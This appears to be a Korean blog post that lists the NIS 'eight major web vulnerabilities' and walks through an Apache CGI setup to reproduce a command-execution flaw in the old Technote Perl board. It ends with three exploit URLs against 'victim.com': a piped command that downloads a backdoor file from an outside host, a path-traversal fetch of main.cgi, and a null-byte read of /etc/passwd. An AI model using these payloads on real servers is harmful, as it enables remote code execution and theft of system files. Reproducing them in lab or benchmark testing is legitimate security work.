티스토리 뷰


국정원 8대 취약점은 국내에서 해킹에 많이 이용되었던 보안 취약점을 2005년도에 발표한 것입니다.

2005년도에 발표되었지만 아직도 이 국정원 8대 취약점을 가지고 아직도 BMT를 하는 회사들이 많이 있습니다.

때문에 이 BMT를 통과하기위해 어거지로  쓰지도 않는 기능들을 제품에 넣을때도 상당수 있습니다.

한편으로는 진보하면서 한편으로는 뒤로 계속적으로 후퇴하거나 머물러있기도 합니다.

* 국정원 8대 취약점 *

1. 디렉토리 리스팅 취약점
2. 파일 다운로드 취약점
3. XSS 취약점
4. 파일 업로드 취약점
5. WEBDAV 취약점
6. 테크노트 취약점
7. 제로보드 취약점
8. SQL Injection 취약점 
하지만 국정원 8대 취약점의 대부분은 아직까지도 크리티컬한 공격으로서 존재합니다.

그중 일부는 쇄퇴하여 공격으로서의 가치는 있지만 해당 플래폼을 사용하지 않아 공격의 빈도가 거의 없는 공격도 있습니다.

그중 대표적인것이 테크노트 취약점 입니다. 

테크노트 취약점은 cgi 기반으로 되어있던 1999-2001 년도 즈음 시절에 인기를 누리던 설치형 게시판입니다.

perl을 지원만 하면 누구나 설치하여 사용할 수 있습니다.

문제는 이 버젼에 존재하고 있었던 서버의 명령어를 실행할 수 있었던 취약점입니다.

이번시간(?)에는 아파치 환경에서 cgi 를 지원하여 억지로!! 취약점을 실행해보도록 하겠습니다 (--)(__)(--)(__)


취약점 구현 또는 BMT 용도로만 사용하시기를 부탁드리겠습니다. 떙큐



우선적으로 지금은 대부분 perl 을 사용하지 않기 때문에 아파치 설정을 올바로 세팅해주어야 합니다.

아파치를 아직 설치하지 않으셨다면 아래 링크를 통해 아파치를 설치하시기 바랍니다.

아파치 설정하는법 바로가기


제가사용한 시스템은 fedora 또는 cent os 기준입니다. 시스템이 사용자마다 다를수 있으므로 환경설정파일의 위치를 잘 파악하시기를 바랍니다.

httpd.conf 파일을 열어서 아래의 구문을 주석해제 하시면 됩니다.

AddHandler cgi-script .cgi .pl


이후 아래의 세팅을 조절하시면 됩니다. default 로는 /var/www/cgi-bin 의 위치에서 실행이 됩니다.

<Directory "/var/www/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
    AddHandler cgi-script .cgi .pl
</Directory>


그리고 apache를 재시작 합니다.

# service httpd restart


cgi-bin 은 아스키로 업로드 되어야 하고 퍼미션을 주어야 하는등 굉장히 까다롭습니다.

테크노트 설치 매뉴얼로 살펴보시면 잘 나와있습니다. 그대로 따라하시면 됩니다.

대부분 755 ( -rwxr-xr-x )정도의 퍼미션이면 무난하게 동작합니다.

/var/www/cgi-bin 폴더에 테크노트의 압축을 풀어서 설치하면 아래와 같이 동작합니다.

앗. 이미지 폴더에 대한 퍼미션이 잘못된건지 엑박으로 뜨네요.

뭐 상관없습니다. 저는 취약점만 테스트하고 쫑낼꺼니까요.ㅋㅋ





테크노트 취약점은 구글을 통해서 검색하시면 나옵니다. 참고하시기 바랍니다.

http://victim.com/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=|명령어%20-P%20/tmp%20http://백도어파일

http://victim/technote/main.cgi/oops?board=FREE_BOARD& command=down_load&filename=/../../../main.cgi

http://victim.com/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00



구현완료.



크래킹은 몸에 해롭습니다.


문의사항 있으시면 연락주세요

옹갈군 연락처 바로가기
댓글